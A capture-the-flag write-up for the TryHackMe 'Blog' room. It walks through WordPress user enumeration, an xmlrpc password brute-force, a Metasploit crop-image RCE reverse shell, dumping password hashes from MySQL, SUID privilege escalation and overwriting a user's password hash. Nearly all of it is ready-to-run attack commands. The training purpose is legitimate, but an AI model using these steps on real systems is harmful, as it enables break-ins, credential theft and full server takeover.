TryHackMe Blog Writeup
Discover the foundational aspects of cybersecurity with the Blog Capture The Flag (CTF) challenge, an medium-level exercise. This concise write-up provides clear insights into essential WordPress concepts, presented with simplicity and clarity.
https://tryhackme.com/r/room/blog
Add Hosts#
Edit the /etc/hosts file and add the following entries:
10.10.100.29 blog.thm
Script to add hosts automatically#
ip="10.10.100.29";domain="blog.thm"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Gather Information From WordPress#
wpscan -e u --url "http://blog.thm/"
- -e = enumarate
- u = usernames
result#
- users = bjoel,kwheel
- theme = twentytwenty
BruteForce WordPress#
wpscan --url "http://blog.thm/" --usernames bjoel,kwheel --passwords /usr/share/dict/rockyou.txt --password-attack xmlrpc threads 20
result#
- kwheel:cutiepie1
Exploit to Gain Acces#
msfconsole
use multi/http/wp_crop_rce
set password cutiepie1
set username kwheel
set rhosts blog.thm
set THEME_DIR twentytwenty
set lhost tun0
exploit
shell
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
Extract Password Hash From MySQL#
cat wp-config.php
mysql -u wordpressuser -p
show databases;
use blog;
show tables;
select * from wp_users;
exit
Privilege Escalation#
find uid binaries
find / -type f -perm -u=s 2>/dev/null
result#
- vulnerable = /usr/sbin/checker
ltrace /usr/sbin/checker
result#
- env(admin)
this means the program is reading the admin variable
now simply run it with the variable admin
admin=1 /usr/sbin/checker;/usr/sbin/checker
whoami
Optional#
WordPress Password Hash Generator
gen a password i ’ve done password
mysql -u wordpressuser -p
show databases;
use blog;
show tables;
select * from wp_users;
UPDATE wp_users SET user_pass = "$P$Bq7XDB8Xb/jjexb8e4CIiDw38/2HyO." WHERE user_nicename="bjoel";
select * from wp_users;
exit
now you can login http://blog.thm/wp-login.php with bjoel:password
Finally#
cat /root/root.txt
cat /media/usb/user.txt